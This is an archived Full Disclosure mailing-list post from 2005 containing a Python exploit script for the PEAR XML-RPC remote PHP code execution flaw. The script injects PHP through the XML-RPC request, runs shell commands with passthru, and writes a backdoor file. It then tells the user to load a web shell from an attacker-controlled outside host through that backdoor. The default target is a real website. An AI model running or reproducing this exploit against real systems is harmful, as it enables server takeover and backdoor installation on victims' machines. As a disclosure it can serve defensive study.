BugTraq
Full Disclosure - XMLRPC Exploit Code written in Python jul 2005 Jul 12 2005 08:50PM
Anonymous Anonymous com
#!/usr/bin/python

# ./xmlrpc.py [chk|xpl] host uri
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working for me
# so i made this python code
# http://pear.php.net/bugs/bug.php?id=4692
# Bug #4692 Remote Code Exection In XML RPC Server
# xmlrpc.pl http://pathtoxmlrpc/server
# "id;pwd;uname -a;uptime"
# [*] Sending command id;pwd;uname -a;uptime
# [*] Command sent, waiting for response
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# /var/www/drupal
# Linux cacophony 2.4.18-bf2.4 Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
# 23:27:22 up 5 days, 9:05, 0 users, load average: 0.12, 0.16, 0.21
# http://www.postnuke.com/xmlrpc.php
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005

import sys, httplib

try:
chose = sys.argv[1]
except IndexError:
chose = 'chk'

try:
host = sys.argv[2]
except IndexError:
host = 'www.postnuke.com'

try:
uri = sys.argv[3]
except IndexError:
uri = '/xmlrpc.php'

def check():
SoapMessage = """<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); phpinfo(); exit;/*</name></value>
</param>
</params>
</methodCall>
"""

webservice = httplib.HTTP("%s" % host)
webservice.putrequest("POST", "%s" % uri)
webservice.putheader("Host", "%s" % host)
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke k3rn37p4nic")
webservice.putheader("Content-type", "application/xml")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
webservice.endheaders()
webservice.send(SoapMessage)

# get the response

statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage
print "headers: ", header
res = webservice.getfile().read()
print res
print 'If you see phpinfo dump data the you are succeful. proceed with xpl!'

def xpl():

SoapMessage = """<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>',''));
echo 'start';
passthru('del xmlrpcpy.php');
$filename = 'xmlrpcpy.php';
$somecontent = '%?php include(~inc); ?#';
$somecontent = eregi_replace('%', chr(60), $somecontent);
$somecontent = eregi_replace('~', chr(36), $somecontent);
$somecontent = eregi_replace('#', chr(62), $somecontent);
$handle = fopen($filename,'w');
fwrite($handle, $somecontent);
fclose($handle);

passthru('dir');

passthru('type xmlrpcpy.php');

echo 'done';
exit;
/*</name></value>
</param>
</params>
</methodCall>
"""

webservice = httplib.HTTP("%s" % host)
webservice.putrequest("POST", "%s" % uri)
webservice.putheader("Host", "%s" % host)
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke k3rn37p4nic")
webservice.putheader("Content-type", "application/xml")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
webservice.endheaders()
webservice.send(SoapMessage)

# get the response

statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage
print "headers: ", header
res = webservice.getfile().read()
print res
print '\n\nExploit Successful!!!\nDownload http://www.suneworld.com/programs/webexplorer20.zip'
print 'Rename index.php3 to index.txt and put it to some public host http://somehost.com/index.txt'
print 'Now Accessed it like this: '
print 'http://victimhost/postnukewhatever/xmlrpcpy.php?inc=http://somehost.com
/index.txt'
print 'Then upload your favorite haxor tools! Bye. Stay healthy!'

if __name__ == "__main__":
print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
print 'revised it if you can! ver jul 2005'
print 'Greetz: Albanian Security Clan!!!'
print '---------------------------------------------'
print './xmlrpc.py [chk|xpl] host uri'
print 'example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php'
print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php'
if chose=='chk':
check()
elif chose=='xpl':
xpl();
else:
print 'Boom! Script Kiddie'

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus